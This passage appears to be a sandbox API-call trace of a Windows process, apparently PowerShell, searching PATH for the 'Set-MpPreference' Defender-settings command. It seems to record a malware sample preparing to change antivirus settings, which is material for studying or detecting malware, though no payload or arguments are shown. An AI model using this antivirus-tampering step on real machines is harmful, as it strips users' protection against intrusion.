	[0089.771] VirtualQuery (in: lpAddress=0x43ae1bc, lpBuffer=0x43af1bc, dwLength=0x1c | out: lpBuffer=0x43af1bc*(BaseAddress=0x43ae000, AllocationBase=0x3a20000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.772] GetLastError () returned 0xcb
	[0089.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.773] GetLastError () returned 0xcb
	[0089.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.773] GetLastError () returned 0xcb
	[0089.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.777] GetLastError () returned 0xcb
	[0089.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.792] GetLastError () returned 0xcb
	[0089.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.814] GetLastError () returned 0xcb
	[0089.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.815] GetLastError () returned 0xcb
	[0089.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.816] GetLastError () returned 0xcb
	[0089.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.817] GetLastError () returned 0xcb
	[0089.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.818] GetLastError () returned 0xcb
	[0089.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.819] GetLastError () returned 0xcb
	[0089.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.820] GetLastError () returned 0xcb
	[0089.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.837] GetLastError () returned 0xcb
	[0089.871] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0089.871] GetLastError () returned 0xcb
	[0089.874] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x88
	[0089.874] GetLastError () returned 0xcb
	[0089.874] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3b1740, nSize=0x88 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0089.874] GetLastError () returned 0xcb
	[0089.884] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3b18e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0089.884] GetLastError () returned 0xcb
	[0089.891] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.891] GetLastError () returned 0xcb
	[0089.892] SetErrorMode (uMode=0x1) returned 0x1
	[0089.894] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.ps1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.894] GetLastError () returned 0x2
	[0089.894] SetErrorMode (uMode=0x1) returned 0x1
	[0089.895] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.896] GetLastError () returned 0x2
	[0089.896] SetErrorMode (uMode=0x1) returned 0x1
	[0089.896] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psm1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.896] GetLastError () returned 0x2
	[0089.896] SetErrorMode (uMode=0x1) returned 0x1
	[0089.896] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.896] GetLastError () returned 0x2
	[0089.896] SetErrorMode (uMode=0x1) returned 0x1
	[0089.896] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psd1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.896] GetLastError () returned 0x2
	[0089.896] SetErrorMode (uMode=0x1) returned 0x1
	[0089.896] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.896] GetLastError () returned 0x2
	[0089.896] SetErrorMode (uMode=0x1) returned 0x1
	[0089.896] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.COM", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.897] GetLastError () returned 0x2
	[0089.897] SetErrorMode (uMode=0x1) returned 0x1
	[0089.897] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.897] GetLastError () returned 0x2
	[0089.897] SetErrorMode (uMode=0x1) returned 0x1
	[0089.897] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.EXE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.897] GetLastError () returned 0x2
	[0089.897] SetErrorMode (uMode=0x1) returned 0x1
	[0089.897] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.897] GetLastError () returned 0x2
	[0089.897] SetErrorMode (uMode=0x1) returned 0x1
	[0089.897] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.BAT", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.897] GetLastError () returned 0x2
	[0089.898] SetErrorMode (uMode=0x1) returned 0x1
	[0089.898] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.898] GetLastError () returned 0x2
	[0089.898] SetErrorMode (uMode=0x1) returned 0x1
	[0089.898] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.CMD", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.898] GetLastError () returned 0x2
	[0089.898] SetErrorMode (uMode=0x1) returned 0x1
	[0089.898] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.898] GetLastError () returned 0x2
	[0089.898] SetErrorMode (uMode=0x1) returned 0x1
	[0089.898] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.898] GetLastError () returned 0x2
	[0089.898] SetErrorMode (uMode=0x1) returned 0x1
	[0089.898] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.898] GetLastError () returned 0x2
	[0089.898] SetErrorMode (uMode=0x1) returned 0x1
	[0089.899] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.899] GetLastError () returned 0x2
	[0089.899] SetErrorMode (uMode=0x1) returned 0x1
	[0089.899] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.899] GetLastError () returned 0x2
	[0089.899] SetErrorMode (uMode=0x1) returned 0x1
	[0089.899] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.899] GetLastError () returned 0x2
	[0089.899] SetErrorMode (uMode=0x1) returned 0x1
	[0089.899] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.899] GetLastError () returned 0x2
	[0089.899] SetErrorMode (uMode=0x1) returned 0x1
	[0089.899] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JSE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.900] GetLastError () returned 0x2
	[0089.900] SetErrorMode (uMode=0x1) returned 0x1
	[0089.900] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.900] GetLastError () returned 0x2
	[0089.900] SetErrorMode (uMode=0x1) returned 0x1
	[0089.900] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSF", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.900] GetLastError () returned 0x2
	[0089.900] SetErrorMode (uMode=0x1) returned 0x1
	[0089.900] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.900] GetLastError () returned 0x2
	[0089.900] SetErrorMode (uMode=0x1) returned 0x1
	[0089.900] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSH", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.900] GetLastError () returned 0x2
	[0089.900] SetErrorMode (uMode=0x1) returned 0x1
	[0089.900] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.900] GetLastError () returned 0x2
	[0089.901] SetErrorMode (uMode=0x1) returned 0x1
	[0089.901] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.MSC", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.901] GetLastError () returned 0x2
	[0089.901] SetErrorMode (uMode=0x1) returned 0x1
	[0089.901] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0089.901] GetLastError () returned 0x2
	[0089.901] SetErrorMode (uMode=0x1) returned 0x1
	[0089.901] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.901] GetLastError () returned 0x2
	[0089.901] SetErrorMode (uMode=0x1) returned 0x1
	[0089.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.903] GetLastError () returned 0x2
	[0089.903] SetErrorMode (uMode=0x1) returned 0x1
	[0089.903] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.903] GetLastError () returned 0x2
	[0089.903] SetErrorMode (uMode=0x1) returned 0x1
	[0089.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.903] GetLastError () returned 0x2
	[0089.903] SetErrorMode (uMode=0x1) returned 0x1
	[0089.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.904] GetLastError () returned 0x2
	[0089.904] SetErrorMode (uMode=0x1) returned 0x1
	[0089.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.904] GetLastError () returned 0x2
	[0089.904] SetErrorMode (uMode=0x1) returned 0x1
	[0089.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.904] GetLastError () returned 0x2
	[0089.904] SetErrorMode (uMode=0x1) returned 0x1
	[0089.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.904] GetLastError () returned 0x2
	[0089.904] SetErrorMode (uMode=0x1) returned 0x1
	[0089.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.904] GetLastError () returned 0x2
	[0089.904] SetErrorMode (uMode=0x1) returned 0x1
	[0089.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.905] GetLastError () returned 0x2
	[0089.905] SetErrorMode (uMode=0x1) returned 0x1
	[0089.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.905] GetLastError () returned 0x2
	[0089.905] SetErrorMode (uMode=0x1) returned 0x1
	[0089.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.905] GetLastError () returned 0x2
	[0089.905] SetErrorMode (uMode=0x1) returned 0x1
	[0089.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.905] GetLastError () returned 0x2
	[0089.905] SetErrorMode (uMode=0x1) returned 0x1
	[0089.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.905] GetLastError () returned 0x2
	[0089.905] SetErrorMode (uMode=0x1) returned 0x1
	[0089.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.906] GetLastError () returned 0x2
	[0089.906] SetErrorMode (uMode=0x1) returned 0x1
	[0089.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.906] GetLastError () returned 0x2
	[0089.906] SetErrorMode (uMode=0x1) returned 0x1
	[0089.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.906] GetLastError () returned 0x2
	[0089.906] SetErrorMode (uMode=0x1) returned 0x1
	[0089.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.906] GetLastError () returned 0x2
	[0089.906] SetErrorMode (uMode=0x1) returned 0x1
	[0089.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
